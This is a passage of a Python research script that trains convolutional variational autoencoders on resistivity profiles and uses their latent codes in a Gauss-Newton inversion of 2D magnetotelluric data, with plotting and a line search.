Conv1DTranspose(32, 3, strides=2, padding=\"same\")(x) # 16 32\r\n x = Conv1D(32, 3, padding=\"same\")(x)\r\n x = BatchNormalization()(x)\r\n x = keras.activations.swish(x)\r\n\r\n x = Conv1D(32, 3, padding=\"same\")(x)\r\n x = BatchNormalization()(x)\r\n x = keras.activations.swish(x)\r\n\r\n x = Conv1DTranspose(16, 3, strides=2, padding=\"same\")(x) # 32 16\r\n x = Conv1D(16, 3, padding=\"same\")(x)\r\n x = BatchNormalization()(x)\r\n x = keras.activations.swish(x)\r\n\r\n x = Conv1D(16, 3, padding=\"same\")(x)\r\n x = BatchNormalization()(x)\r\n x = keras.activations.swish(x)\r\n\r\n x = Conv1DTranspose(1, 3, strides=2, padding=\"same\")(x) # 64 1\r\n x = Conv1D(1, 3, padding=\"same\")(x)\r\n\r\noutputs = x\r\ndecoder = Model(decoder_inputs, outputs)\r\ndecoder.summary()\r\n\r\noutputs = decoder(encoder_output)\r\nvae = Model(inputs, outputs)\r\nkl_loss = kl_weight * -0.5 * tf.reduce_mean(z_log_var - tf.square(z_mean) - tf.exp(z_log_var) + 1)\r\nvae.add_loss(kl_loss)\r\n# ssim_loss = 1-tf.reduce_mean(tf.image.ssim(inputs,outputs,max_val=1))\r\n# vae.add_loss(ssim_loss)\r\ndef my_loss_fn(y_true, y_pred):\r\n loss1=tf.reduce_mean(tf.square(y_true - y_pred), axis=-1)\r\n loss2= 1-tf.reduce_mean(tf.image.ssim(y_true,y_pred,max_val=1))\r\n # loss3 = 1e-2 * -0.5 * tf.reduce_mean(z_log_var - tf.square(z_mean) - tf.exp(z_log_var) + 1)\r\n return loss1 + ssim_w * loss2\r\n\r\ndef mse_loss(y_true, y_pred):\r\n return tf.reduce_mean(tf.square(y_true - y_pred), axis=-1)\r\n\r\ndef ssim_loss(y_true, y_pred):\r\n return 1e-2*(1-tf.reduce_mean(tf.image.ssim(y_true,y_pred,max_val=1)))\r\n\r\nlr_schedule = keras.callbacks.ReduceLROnPlateau(monitor='val_loss', factor=0.2,\r\n patience=10, min_lr=0.000001, verbose=1)\r\nvae.compile(optimizer=Adam(learning_rate=5e-4), loss=my_loss_fn, metrics=[mse_loss])\r\nvae.summary()\r\n\r\n# %% Network 2\r\ninputs = Input(shape=(H,C), name=\"inputs\") # 64 1\r\nif True:\r\n x = inputs\r\n\r\n x = Conv1D(16, 3, padding=\"same\")(x)\r\n x = BatchNormalization()(x)\r\n x = keras.activations.swish(x)\r\n # x = MaxPool1D(2)(x) # 32 16\r\n\r\n x = Conv1D(16, 3, padding=\"same\")(x)\r\n x = BatchNormalization()(x)\r\n x = keras.activations.swish(x)\r\n x = MaxPool1D(2)(x) # 32 16\r\n\r\n x = Conv1D(32, 3, padding=\"same\")(x)\r\n x = BatchNormalization()(x)\r\n x = keras.activations.swish(x)\r\n # x = MaxPool1D(2)(x) # 16 32\r\n\r\n x = Conv1D(32, 3, padding=\"same\")(x)\r\n x = BatchNormalization()(x)\r\n x = keras.activations.swish(x)\r\n x = MaxPool1D(2)(x) # 16 32\r\n\r\n x = Conv1D(64, 3, padding=\"same\")(x)\r\n x = BatchNormalization()(x)\r\n x = keras.activations.swish(x)\r\n # x = MaxPool1D(2)(x) # 8 64\r\n\r\n x = Conv1D(64, 3, padding=\"same\")(x)\r\n x = BatchNormalization()(x)\r\n x = keras.activations.swish(x)\r\n x = MaxPool1D(2)(x) # 8 64\r\n\r\n x = Flatten()(x)\r\n units = x.shape[1]\r\n z_mean = Dense(latent_dim2, name=\"z_mean\")(x)\r\n z_log_var = Dense(latent_dim2, name=\"z_log_var\")(x)\r\n\r\n meanModel2 = Model(inputs,z_mean) # 64 - 8\r\n # encoder_output = Sampling()((z_mean, z_log_var))\r\n encoder_output = Sampling()((meanModel2(inputs), z_log_var))\r\n\r\n encoder = Model(inputs,encoder_output)\r\n # encoder.compile(optimizer=Adam(1e-3), loss='mse')\r\n encoder.summary()\r\n\r\n decoder_inputs = Input(shape = (latent_dim2), name=\"decoder_inputs\")\r\n x = Dense(units)(decoder_inputs)\r\n x = keras.activations.swish(x)\r\n x = Reshape((8, 64))(x)\r\n\r\n x = Conv1DTranspose(32, 3, strides=2, padding=\"same\")(x) # 16 32\r\n x = Conv1D(32, 3, padding=\"same\")(x)\r\n x = BatchNormalization()(x)\r\n x = keras.activations.swish(x)\r\n\r\n x = Conv1D(32, 3, padding=\"same\")(x)\r\n x = BatchNormalization()(x)\r\n x = keras.activations.swish(x)\r\n\r\n x = Conv1DTranspose(16, 3, strides=2, padding=\"same\")(x) # 32 16\r\n x = Conv1D(16, 3, padding=\"same\")(x)\r\n x = BatchNormalization()(x)\r\n x = keras.activations.swish(x)\r\n\r\n x = Conv1D(16, 3, padding=\"same\")(x)\r\n x = BatchNormalization()(x)\r\n x = keras.activations.swish(x)\r\n\r\n x = Conv1DTranspose(1, 3, strides=2, padding=\"same\")(x) # 64 1\r\n x = Conv1D(1, 3, padding=\"same\")(x)\r\n\r\noutputs = x\r\ndecoder2 = Model(decoder_inputs, outputs)\r\ndecoder2.summary()\r\n\r\noutputs = decoder2(encoder_output)\r\nvae2 = Model(inputs, outputs)\r\n\r\n# %%\r\nbatch_size=int(64)\r\n\r\ncheckpoint_path = dir_name + '/cp.ckpt'\r\ncheckpoint_path2 = dir_name2 + '/cp.ckpt'\r\n# checkpoint_path = \"training_2/cp-{epoch:04d}.ckpt\"\r\n\r\ncheckpoint_dir = os.path.dirname(checkpoint_path)\r\ncp_callback = tf.keras.callbacks.ModelCheckpoint(filepath=checkpoint_path,verbose=1,\r\n save_best_only=True, save_weights_only=True)\r\n\r\ncheckpoint_dir2 = os.path.dirname(checkpoint_path2)\r\n\r\nif TRAIN == 1:\r\n vae.save_weights(checkpoint_path.format(epoch=0))\r\n history = vae.fit(\r\n rho_train,\r\n rho_train,\r\n epochs=200,\r\n batch_size=batch_size,\r\n shuffle=True,\r\n validation_data=(rho_test, rho_test),callbacks=[cp_callback, lr_schedule]\r\n )\r\n # os.listdir(checkpoint_dir)\r\n import pandas as pd\r\n\r\n # convert the history.history dict to a pandas DataFrame:\r\n hist_df = pd.DataFrame(history.history)\r\n\r\n # save to json:\r\n hist_json_file = dir_name + '/history.json'\r\n with open(hist_json_file, mode='w') as f:\r\n hist_df.to_json(f)\r\n\r\n with open(dir_name + '/history.json','r',encoding='utf8')as fp:\r\n json_data = json.load(fp) #\r\n # or save to csv:\r\n # hist_csv_file = dir_name + '/history.csv'\r\n # with open(hist_csv_file, mode='w') as f:\r\n # hist_df.to_csv(f)\r\n\r\nlatest = tf.train.latest_checkpoint(checkpoint_dir)\r\nvae.load_weights(latest)\r\n\r\nlatest2 = tf.train.latest_checkpoint(checkpoint_dir2)\r\nvae2.load_weights(latest2)\r\n# with open('/trainHistoryDict', 'wb') as file_pi:\r\n# pickle.dump(history.history, file_pi)\r\n\r\n# %% Generate row data\r\n#time_start = time.time()\r\nif TRAIN == 1 or TRAIN == 2:\r\n for jj in range(5):\r\n rho_test_no = int(jj)\r\n rho_test_no1 = rho_test[rho_test_no:rho_test_no+1,:,:,:]\r\n v_true = meanModel(rho_test_no1) # input can be tensor or numpy, output is numpy\r\n v1 = v_true\r\n # v1=tf.constant(v_true)\r\n test_pred_y = decoder(v1)\r\n test_pred_y = K.eval(test_pred_y)\r\n rho_test_no1_p = np.reshape(test_pred_y, [64, 128], order='F')\r\n # h_je.Plot2DImage(fieldXEnd-fieldXStart, domainDepth, interpXLocations, interpDepths, rho_test_no1, 'mt', [1, 2], 0,\r\n # 1, dir_name+'/no', str(rho_test_no)+'.png', rangex=[-2.1,12.9], rangez=[-2,0])\r\n # h_je.Plot2DImage(fieldXEnd-fieldXStart, domainDepth, interpXLocations, interpDepths, rho_test_no1_p, 'mt', [1, 2], 0,\r\n # 1, dir_name+'/no', str(rho_test_no)+'_p.png', rangex=[-2.1,12.9], rangez=[-2,0])\r\n\r\n sig_power = np.average(v_true**2)\r\n noi_power = 1 * sig_power\r\n noise = np.random.normal(0, np.sqrt(noi_power), latent_dim)\r\n # for ii in range(10):\r\n # Ka = 0.1*ii+0.1\r\n # noise1 = Ka*noise\r\n # v1=v_true+noise1\r\n # test_pred_y = decoder(v1)\r\n # test_pred_y = K.eval(test_pred_y)\r\n # rho_test_no1_rand = np.reshape(test_pred_y, [64, 128], order='F')\r\n # h_je.Plot2DImage(fieldXEnd-fieldXStart, domainDepth, interpXLocations, interpDepths, rho_test_no1_rand, 'mt', [1, 2], 0,\r\n # 1, dir_name+'/no', str(rho_test_no)+'_{:.1f}.png'.format(Ka), rangex=[-2.1,12.9], rangez=[-2,0])\r\n\r\n rho_test_no5 = int(jj)\r\n rho_test_no5 = rho_test[rho_test_no5:rho_test_no5 + 1, :, :, :]\r\n v_true5 = meanModel(rho_test_no5) # input can be tensor or numpy, output is numpy\r\n rho_test_no6 = int(jj+1)\r\n rho_test_no6 = rho_test[rho_test_no6:rho_test_no6 + 1, :, :, :]\r\n v_true6 = meanModel(rho_test_no6) # input can be tensor or numpy, output is numpy\r\n h_je.Plot2DImage(fieldXEnd - fieldXStart, domainDepth, interpXLocations, interpDepths, rho_test_no5, 'mt', [bar_1, bar_2],\r\n 0,\r\n 1, dir_name + '/no', str(jj) + '.png', rangex=[-2.1, 12.9], rangez=[-2, 0])\r\n h_je.Plot2DImage(fieldXEnd - fieldXStart, domainDepth, interpXLocations, interpDepths, rho_test_no6, 'mt', [bar_1, bar_2],\r\n 0,\r\n 1, dir_name + '/no', str(jj+1) + '.png', rangex=[-2.1, 12.9], rangez=[-2, 0])\r\n for kk in range(11):\r\n v_5_6 = kk * 0.1 * v_true6 + (10 - kk) * 0.1 * v_true5\r\n test_pred_y = decoder(v_5_6)\r\n test_pred_y = K.eval(test_pred_y)\r\n rho_test_no1_rand = np.reshape(test_pred_y, [64, 128], order='F')\r\n h_je.Plot2DImage(fieldXEnd - fieldXStart, domainDepth, interpXLocations, interpDepths, rho_test_no1_rand, 'mt',\r\n [bar_1, bar_2], 0,\r\n 1, dir_name + '/no', str(jj) + '.{:d}.png'.format(kk), rangex=[-2.1, 12.9],\r\n rangez=[-2, 0])\r\n\r\n odod=['df']+2\r\n\r\n# %%\r\nprint('Inversion with Gauss-Newton')\r\nif not os.path.exists('./inversion_results/'+UID):\r\n os.makedirs('./inversion_results/'+UID)\r\n print('./inversion_results/'+UID+' does not exist! create it.')\r\n\r\n[vG, hG] = h_je.computeGradient(interpXLocations, interpDepths, XNumberMT1, ZNumberMT1)\r\n\r\n# DT = np.loadtxt(\"../myHTEM_20220707_for_1D_VAE/model20220809_clean.modt\")\r\n# DT = np.loadtxt(\"../myHTEM_20220707_for_1D_VAE/model20220811b_clean.modt\")\r\nDT = np.loadmat(\"Model-A.mat\")\r\n# DT = np.loadtxt(\"../myHTEM_20220707_for_1D_VAE/model_2D_B.modt\")\r\n\r\nData_set = np.reshape(DT, (ZNumberMT1, XNumberMT1), order='c')\r\n# Data_set[Data_set==10]=100\r\nData_set_log = np.log10(Data_set)\r\n# beta = np.linalg.norm(vG*np.reshape(Data_set_log, -1, order='f'))**2\r\n\r\nv_true_array = np.zeros((1, latent_dim*XNumberMT1))\r\nfor jj in range(XNumberMT1):\r\n true_rho = Data_set_log[:, jj]\r\n v_true = meanModel(true_rho.reshape([1,ZNumberMT1,1],order='F'))\r\n v_true = tf.constant(v_true)\r\n v_true = K.eval(v_true)\r\n v_true2 = meanModel2(true_rho.reshape([1, ZNumberMT1, 1], order='F'))\r\n v_true2 = tf.constant(v_true2)\r\n v_true2 = K.eval(v_true2)\r\n if (jj <= 23 and jj >= 14):\r\n v_true_array[:, jj * latent_dim:(jj + 1) * latent_dim] = v_true2\r\n else:\r\n v_true_array[:,jj*latent_dim:(jj+1)*latent_dim] = v_true\r\n\r\nxs = np.linspace(0,XNumberMT1,XNumberMT1+1,dtype='uint8')\r\nzs = np.linspace(0,latent_dim,latent_dim+1,dtype='uint8')\r\n[xss, zss] = np.meshgrid(xs, zs)\r\n\r\nfig = plt.figure(figsize=(5,5))\r\nax1 = fig.add_subplot(1,1,1)\r\nplt.pcolor(xss, zss, np.reshape(v_true_array, (latent_dim, XNumberMT1), order='f'), cmap=plt.get_cmap('jet'))\r\n# plt.xlim(-1, plot_x-1)\r\n# plt.ylim(-1, plot_y-1)\r\ncbar = plt.colorbar()\r\nplt.clim(np.min(v_true_array), np.max(v_true_array))\r\nplt.tight_layout()\r\nplt.savefig('./inversion_results/'+UID+'/code_true.png')\r\nplt.close()\r\n\r\nfrequencyMT = np.logspace(fre1, fre2, freqNumberMT) # 0 Corresponds to 5000m\r\n# frequencyMT = np.logspace(1, 4, freqNumberMT)\r\n# rxIndexMT = np.array(np.linspace(10, 118, 16),dtype='uint32') # 1-128 total\r\nrxIndexMT = np.array(np.linspace(5, 45, 16),dtype='uint32') # 1-128 total\r\nrxNumberMT = len(rxIndexMT)\r\nRxMT = [0, 10000]\r\n\r\n[ia_temp, ja, value, Ub, Area, index1, Z] = MT.MT2SparseEquationSetUp_zhhy(interpXLocations, interpDepths)\r\n\r\nMT2DFWD2_packet = {'freq':frequencyMT,'Field_rho':Data_set_log,'Rx':RxMT,'Field_grid_x':interpXLocations,\r\n 'Field_grid_z':interpDepths, 'X_number':XNumberMT1,'Z_number':ZNumberMT1,'Rx_index':rxIndexMT}\r\n\r\nif SELECT_AS_INVERSIONMODE:\r\n pool = multiprocessing.Pool(8)\r\n # pool = ProcessingPool(8)\r\n# MT2DFWD2_back = pool.map(functools.partial(MT.MT2DFWD2, MT2DFWD2_packet), range(len(frequencyMT)))\r\ntmstp4a = time.time()\r\n# print(\"before optimization MTFWD time = {} s\".format(tmstp4a-timestamp4))\r\nMT2DFWD2_packet['ia_temp'] = ia_temp\r\nMT2DFWD2_packet['ja'] = ja\r\nMT2DFWD2_packet['value'] = value\r\nMT2DFWD2_packet['Ub'] = Ub\r\nMT2DFWD2_packet['Area'] = Area\r\nMT2DFWD2_packet['index1'] = index1\r\nMT2DFWD2_packet['Z'] = Z\r\n\r\n# %%\r\nif SELECT_AS_INVERSIONMODE:\r\n MT2DFWD2_back = pool.map(functools.partial(MT.MT2DFWD2_zhhy, MT2DFWD2_packet), range(len(frequencyMT)))\r\nelse:\r\n MT2DFWD2_back = []\r\n for ii in range(len(frequencyMT)):\r\n bci = MT.MT2DFWD2_zhhy(MT2DFWD2_packet, ii)\r\n MT2DFWD2_back.append(bci)\r\nprint('Successfully computed forward problem')\r\nFieldData = np.zeros(len(rxIndexMT)*2*len(frequencyMT))\r\nfor i in range(len(frequencyMT)):\r\n FieldData[i*len(rxIndexMT):(i+1)*len(rxIndexMT)] = MT2DFWD2_back[i]['data_f'][:len(rxIndexMT)]\r\n FieldData[len(rxIndexMT)*len(frequencyMT) + i*len(rxIndexMT):len(rxIndexMT)*len(frequencyMT) + (i+1)*len(rxIndexMT)] = MT2DFWD2_back[i]['data_f'][len(rxIndexMT):]\r\n\r\nobRhoAmpliAct = FieldData[0:int(len(FieldData)/2)]\r\nobRhoPhaseAct = FieldData[int(len(FieldData) / 2):]\r\n\r\n# Add Noise\r\nFieldData_noise = 0.005*FieldData*np.random.normal(size=(np.shape(FieldData)))\r\nFieldData = FieldData + FieldData_noise*Add_noise\r\n\r\nfig = plt.figure()\r\nax1 = fig.add_subplot(1,1,1)\r\n[xss1, zss1] = np.meshgrid(interpXLocations[rxIndexMT], np.log10(frequencyMT))\r\nplt.pcolor(xss1, zss1, np.reshape(FieldData[:rxNumberMT*freqNumberMT], (freqNumberMT,16), order='c'), cmap=plt.get_cmap('jet'))\r\ncbar = plt.colorbar()\r\nplt.clim(np.min(obRhoAmpliAct), np.max(obRhoAmpliAct))\r\nplt.tight_layout()\r\nplt.savefig('./inversion_results/'+UID+'/data_true.png')\r\nplt.close()\r\n\r\nh_je.Plot2DImage(fieldXEnd-fieldXStart, domainDepth, interpXLocations, interpDepths, Data_set_log, 'mt', [bar_1, bar_2], 0,\r\n 1, './inversion_results/'+UID+'/', 'model_true.png', rangex=[0, 10],\r\n rangez=[-1, 0])\r\n\r\nv_array = np.zeros((1, XNumberMT1*latent_dim))\r\n# tensorData = tf.convert_to_tensor(numpyData, dtype=tf.float32)\r\nrho_recon = initial_res * np.ones(ZNumberMT1, dtype=np.float32)\r\nv = meanModel(rho_recon.reshape([1,ZNumberMT1,1],order='F'))\r\nv2 = meanModel2(rho_recon.reshape([1,ZNumberMT1,1],order='F'))\r\nv = tf.constant(v)\r\nv_np = K.eval(v)\r\nv2 = tf.constant(v2)\r\nv_np2 = K.eval(v2)\r\nfor jj in range(XNumberMT1):\r\n if (jj <= 23 and jj >= 14):\r\n v_array[:, jj * latent_dim:(jj + 1) * latent_dim] = v_np2\r\n else:\r\n v_array[:,jj*latent_dim:(jj+1)*latent_dim] = v_np\r\n\r\n# v_start_array = K.eval(v)\r\nplt.ion()\r\nfig = plt.figure(figsize=(5,5))\r\nax1 = fig.add_subplot(1,1,1)\r\nplt.pcolor(xss, zss, np.reshape(v_array, (latent_dim,XNumberMT1), order='f'), cmap=plt.get_cmap('jet'))\r\n# plt.xlim(-1, plot_x-1)\r\n# plt.ylim(-1, plot_y-1)\r\ncbar = plt.colorbar()\r\nplt.clim(np.min(v_true_array), np.max(v_true_array))\r\nplt.tight_layout()\r\nplt.savefig('./inversion_results/'+UID+'/code_start.png')\r\nplt.ioff()\r\nplt.close()\r\n\r\nrho_recon_pred_ii = decoder(v) # tensor\r\nrho_recon_pred_ii2 = decoder2(v2) # tensor\r\nrho_recon_pred = np.zeros((ZNumberMT1, XNumberMT1))\r\nfor jj in range(XNumberMT1):\r\n if(jj <= 23 and jj >=14):\r\n rho_recon_pred[:, jj] = np.reshape(rho_recon_pred_ii2, -1)\r\n else:\r\n rho_recon_pred[:, jj] = np.reshape(rho_recon_pred_ii, -1)\r\n# rho_recons_img = np.reshape(rho_recon_pred, [64, 128], order='F')\r\nh_je.Plot2DImage(fieldXEnd-fieldXStart, domainDepth, interpXLocations, interpDepths, rho_recon_pred, 'mt', [bar_1, bar_2], 0,\r\n 1, './inversion_results/'+UID+'/', 'model_start.png', rangex=[0, 10],\r\n rangez=[-1, 0])\r\n\r\nCost = [1]\r\nMT2DFWD2_packet['Field_rho'] = rho_recon_pred\r\nif SELECT_AS_INVERSIONMODE:\r\n MT2DFWD2_back = pool.map(functools.partial(MT.MT2DFWD2_zhhy, MT2DFWD2_packet), range(len(frequencyMT)))\r\nelse:\r\n MT2DFWD2_back = []\r\n for ii in range(len(frequencyMT)):\r\n bci = MT.MT2DFWD2_zhhy(MT2DFWD2_packet, ii)\r\n MT2DFWD2_back.append(bci)\r\nnewData = np.zeros(len(rxIndexMT)*2*len(frequencyMT))\r\nEFieldVectorf = np.zeros((XNumberMT1*ZNumberMT1,len(frequencyMT)),dtype='complex')\r\nEobsVector = np.zeros(len(rxIndexMT)*len(frequencyMT), dtype='complex')\r\nHobsVector = np.zeros(len(rxIndexMT)*len(frequencyMT),dtype='complex')\r\nfor i in range(len(frequencyMT)):\r\n newData[i*len(rxIndexMT):(i+1)*len(rxIndexMT)] = MT2DFWD2_back[i]['data_f'][:len(rxIndexMT)]\r\n newData[len(rxIndexMT)*len(frequencyMT) + i*len(rxIndexMT):len(rxIndexMT)*len(frequencyMT) + (i+1)*len(rxIndexMT)] = MT2DFWD2_back[i]['data_f'][len(rxIndexMT):]\r\n EobsVector[i*len(rxIndexMT):(i+1)*len(rxIndexMT)] = MT2DFWD2_back[i]['Eobs_in']\r\n HobsVector[i*len(rxIndexMT):(i+1)*len(rxIndexMT)] = MT2DFWD2_back[i]['Hobs_in']\r\n EFieldVectorf[:,i] = MT2DFWD2_back[i]['EFieldVector_in']\r\n\r\nfig = plt.figure()\r\nax1 = fig.add_subplot(1,1,1)\r\n[xss1, zss1] = np.meshgrid(interpXLocations[rxIndexMT], np.log10(frequencyMT))\r\nplt.pcolor(xss1, zss1, np.reshape(newData[0:int(len(newData)/2)], (freqNumberMT,16), order='c'), cmap=plt.get_cmap('jet'))\r\ncbar = plt.colorbar()\r\nplt.clim(np.min(obRhoAmpliAct), np.max(obRhoAmpliAct))\r\nplt.tight_layout()\r\nplt.savefig('./inversion_results/'+UID+'/data_start.png')\r\nplt.close()\r\n\r\nres = FieldData - newData\r\nCk = norm(res) ** 1 / norm(FieldData) ** 1\r\n# Cost.append(Ck1)\r\n# print('Iter # {}, C = {}'.format(1, Ck1))\r\n\r\nlamdavh = 0e-4\r\nv_ref = np.zeros((1, latent_dim*XNumberMT1))\r\nfor jj in range(max_iter):\r\n [jacobianMTRho, jacobianMTPhi] = jacos.ComputeJacobianFunc_z(EobsVector, HobsVector, EFieldVectorf, frequencyMT,\r\n np.reshape(rho_recon_pred,(ZNumberMT1, XNumberMT1),order='f'), RxMT,\r\n interpXLocations, interpDepths, XNumberMT1, ZNumberMT1,\r\n rxIndexMT, ia_temp, ja, value, Area, index1)\r\n J = np.concatenate((jacobianMTRho, jacobianMTPhi), axis=0) # [Ndata, Nmodel]\r\n\r\n lamda = lamda * lambda_decay\r\n\r\n gk = np.zeros(latent_dim*XNumberMT1)\r\n Hk = np.eye(latent_dim*XNumberMT1)*lamda*Ck\r\n JD = np.zeros((XNumberMT1*ZNumberMT1, XNumberMT1*latent_dim))\r\n for pp in range(XNumberMT1):\r\n print(\"Ite = {}, x_no = {}\".format(jj, pp))\r\n J_slice = J[:, pp*ZNumberMT1:(pp+1)*ZNumberMT1] # [Ndata, Nmodel]\r\n v = v_array[:, pp*latent_dim:(pp+1)*latent_dim]\r\n v = tf.convert_to_tensor(v, dtype=tf.float32)\r\n with tf.GradientTape(watch_accessed_variables=False,persistent=True) as g:\r\n g.watch(v)\r\n if (pp <=23 and pp >= 14):\r\n rho_recon_pred_ii = decoder2(v)\r\n else:\r\n rho_recon_pred_ii = decoder(v)\r\n \r\n jacb = tf.squeeze(g.jacobian(rho_recon_pred_ii,v)).numpy()\r\n # jacb = K.eval(tf.squeeze(g.jacobian(rho_recon_pred,v)))\r\n jacb1 = np.reshape(jacb,[ZNumberMT1, latent_dim],order='F') # [Nmodel, N_latent_z]\r\n\r\n JD[pp*ZNumberMT1:(pp+1)*ZNumberMT1, pp*latent_dim:(pp+1)*latent_dim] = jacb1\r\n\r\n J2 = np.matmul(J_slice,jacb1)\r\n # JLv = np.matmul(Lv,jacb1)\r\n # JLh = np.matmul(Lh,jacb1)\r\n # lamda = lamda * 0.8\r\n v_ref_ii = v_ref[:, pp*latent_dim:(pp+1)*latent_dim]*Use_ref\r\n Hk[pp*latent_dim:(pp+1)*latent_dim, pp*latent_dim:(pp+1)*latent_dim] = \\\r\n Hk[pp*latent_dim:(pp+1)*latent_dim, pp*latent_dim:(pp+1)*latent_dim] + np.matrix(J2).H.dot(J2)\\\r\n / norm(FieldData) ** 2\r\n gk[pp*latent_dim:(pp+1)*latent_dim] = -np.matrix(J2).H.dot(res) / norm(FieldData) ** 2 + lamda * Ck*(v-v_ref_ii)\r\n # gk = -2 * np.matrix(J2).H.dot(res) / norm(FieldData) ** 2 + lamda * Ck1*v\r\n # Hk = 2 * np.matrix(J2).H.dot(J2) / norm(FieldData) ** 2 + lamda * Ck1 * np.eye(latent_dim)\r\n\r\n rho_recon_pred_array = np.reshape(rho_recon_pred, -1, order='f')\r\n hG_JD = hG*JD\r\n hG_m = hG*rho_recon_pred_array\r\n vG_JD = vG*JD\r\n vG_m = vG*rho_recon_pred_array\r\n gk = gk + beta * Ck*np.dot(np.matrix(hG_JD).H, hG_m) + beta2 * Ck*np.dot(np.matrix(vG_JD).H, vG_m)\r\n Hk = Hk + beta * Ck*np.dot(np.matrix(hG_JD).H, hG_JD) + beta2 * Ck*np.dot(np.matrix(vG_JD).H, vG_JD)\r\n # print(\"To here.\")\r\n time1=time.time()\r\n pk = -np.linalg.solve(Hk, gk.T)\r\n time2=time.time()\r\n print('time:' + str(time2 - time1) + 's')\r\n a = 1\r\n v_array_1 = v_array + a * np.transpose(np.real(pk))\r\n # print(v1)\r\n for hh in range(XNumberMT1):\r\n v1 = tf.convert_to_tensor(v_array_1[:, hh*latent_dim:(hh+1)*latent_dim])\r\n if(hh <= 23 and hh >=14):\r\n rho_recon_pred_ii = decoder2(v1)\r\n else:\r\n rho_recon_pred_ii = decoder(v1)\r\n rho_recon_pred[:, hh] = np.squeeze(rho_recon_pred_ii)\r\n # rho_recon_pred_img = np.reshape(rho_recon_pred,[64, 128],order='F')\r\n MT2DFWD2_packet['Field_rho'] = rho_recon_pred\r\n if SELECT_AS_INVERSIONMODE:\r\n MT2DFWD2_back = pool.map(functools.partial(MT.MT2DFWD2_zhhy, MT2DFWD2_packet), range(len(frequencyMT)))\r\n else:\r\n MT2DFWD2_back = []\r\n for ii in range(len(frequencyMT)):\r\n bci = MT.MT2DFWD2_zhhy(MT2DFWD2_packet, ii)\r\n MT2DFWD2_back.append(bci)\r\n newData = np.zeros(len(rxIndexMT)*2*len(frequencyMT))\r\n EFieldVectorf = np.zeros((XNumberMT1*ZNumberMT1,len(frequencyMT)),dtype='complex')\r\n EobsVector = np.zeros(len(rxIndexMT)*len(frequencyMT), dtype='complex')\r\n HobsVector = np.zeros(len(rxIndexMT)*len(frequencyMT),dtype='complex')\r\n for i in range(len(frequencyMT)):\r\n newData[i*len(rxIndexMT):(i+1)*len(rxIndexMT)] = MT2DFWD2_back[i]['data_f'][:len(rxIndexMT)]\r\n newData[len(rxIndexMT)*len(frequencyMT) + i*len(rxIndexMT):len(rxIndexMT)*len(frequencyMT) + (i+1)*len(rxIndexMT)] = MT2DFWD2_back[i]['data_f'][len(rxIndexMT):]\r\n EobsVector[i*len(rxIndexMT):(i+1)*len(rxIndexMT)] = MT2DFWD2_back[i]['Eobs_in']\r\n HobsVector[i*len(rxIndexMT):(i+1)*len(rxIndexMT)] = MT2DFWD2_back[i]['Hobs_in']\r\n EFieldVectorf[:,i] = MT2DFWD2_back[i]['EFieldVector_in']\r\n res = FieldData - newData\r\n v_array = v_array_1\r\n Ck = norm(res) ** 1 / norm(FieldData) ** 1\r\n\r\n # 20220720\r\n ####\r\n v_ref = np.zeros((1, latent_dim*XNumberMT1))\r\n for gg in range(XNumberMT1):\r\n v_gg = meanModel(np.reshape(rho_recon_pred[:, gg], (1,ZNumberMT1, 1), order='f'))\r\n v_gg = tf.constant(v_gg)\r\n v_gg = K.eval(v_gg)\r\n v_ref[:, gg*latent_dim:(gg+1)*latent_dim] = v_gg\r\n plt.ion()\r\n fig = plt.figure(figsize=(5, 5))\r\n ax1 = fig.add_subplot(1, 1, 1)\r\n plt.pcolor(xss, zss, np.reshape(v_ref, (latent_dim, XNumberMT1), order='f'), cmap=plt.get_cmap('jet'))\r\n # plt.xlim(-1, plot_x-1)\r\n # plt.ylim(-1, plot_y-1)\r\n cbar = plt.colorbar()\r\n plt.clim(np.min(v_true_array), np.max(v_true_array))\r\n plt.tight_layout()\r\n plt.savefig('./inversion_results/' + UID + '/code_map_ite_{}.png'.format(jj + 1))\r\n plt.ioff()\r\n plt.close()\r\n # 20220720\r\n\r\n # 20220703: Try qiongsou step length?\r\n # Line Search######################################################\r\n ls_num = 1\r\n while (Ck > Cost[-1] and ls_num < 6):\r\n # cost_propose = 0.5 * norm(Wd * (d_true - d_propose)')^2+0.5*lambda*norm(Wm*m_propose') ^ 2;\r\n a1 = -0.5 * a ** 2 * (np.dot(gk,pk))/(Ck-Cost[-1]-a*np.dot(gk,pk))\r\n if (a1 < 0.01 * a):\r\n a1 = 0.01 * a\r\n a = a1\r\n print(['ite={}, line search, a={}'.format(jj, a)])\r\n v1_propose = v_array + a * np.transpose(np.real(pk))\r\n rho_recon_pred_propose = np.zeros((ZNumberMT1, XNumberMT1))\r\n for hh in range(XNumberMT1):\r\n v1 = tf.convert_to_tensor(v1_propose[:, hh * latent_dim:(hh + 1) * latent_dim])\r\n if(hh <=23 and hh >= 14):\r\n rho_recon_pred_ii = decoder2(v1)\r\n else:\r\n rho_recon_pred_ii = decoder(v1)\r\n rho_recon_pred_propose[:, hh] = np.squeeze(rho_recon_pred_ii)\r\n MT2DFWD2_packet['Field_rho'] = rho_recon_pred_propose\r\n if SELECT_AS_INVERSIONMODE:\r\n MT2DFWD2_back = pool.map(functools.partial(MT.MT2DFWD2_zhhy, MT2DFWD2_packet), range(len(frequencyMT)))\r\n else:\r\n MT2DFWD2_back = []\r\n for ii in range(len(frequencyMT)):\r\n bci = MT.MT2DFWD2_zhhy(MT2DFWD2_packet, ii)\r\n MT2DFWD2_back.append(bci)\r\n newData_propose = np.zeros(len(rxIndexMT) * 2 * len(frequencyMT))\r\n EFieldVectorf = np.zeros((XNumberMT1 * ZNumberMT1, len(frequencyMT)), dtype='complex')\r\n EobsVector = np.zeros(len(rxIndexMT) * len(frequencyMT), dtype='complex')\r\n HobsVector = np.zeros(len(rxIndexMT) * len(frequencyMT), dtype='complex')\r\n for i in range(len(frequencyMT)):\r\n newData_propose[i * len(rxIndexMT):(i + 1) * len(rxIndexMT)] = MT2DFWD2_back[i]['data_f'][:len(rxIndexMT)]\r\n newData_propose[\r\n len(rxIndexMT) * len(frequencyMT) + i * len(rxIndexMT):len(rxIndexMT) * len(frequencyMT) + (i + 1) * len(\r\n rxIndexMT)] = MT2DFWD2_back[i]['data_f'][len(rxIndexMT):]\r\n EobsVector[i * len(rxIndexMT):(i + 1) * len(rxIndexMT)] = MT2DFWD2_back[i]['Eobs_in']\r\n HobsVector[i * len(rxIndexMT):(i + 1) * len(rxIndexMT)] = MT2DFWD2_back[i]['Hobs_in']\r\n EFieldVectorf[:, i] = MT2DFWD2_back[i]['EFieldVector_in']\r\n res = FieldData - newData_propose\r\n Ck_propose = norm(res) ** 1 / norm(FieldData) ** 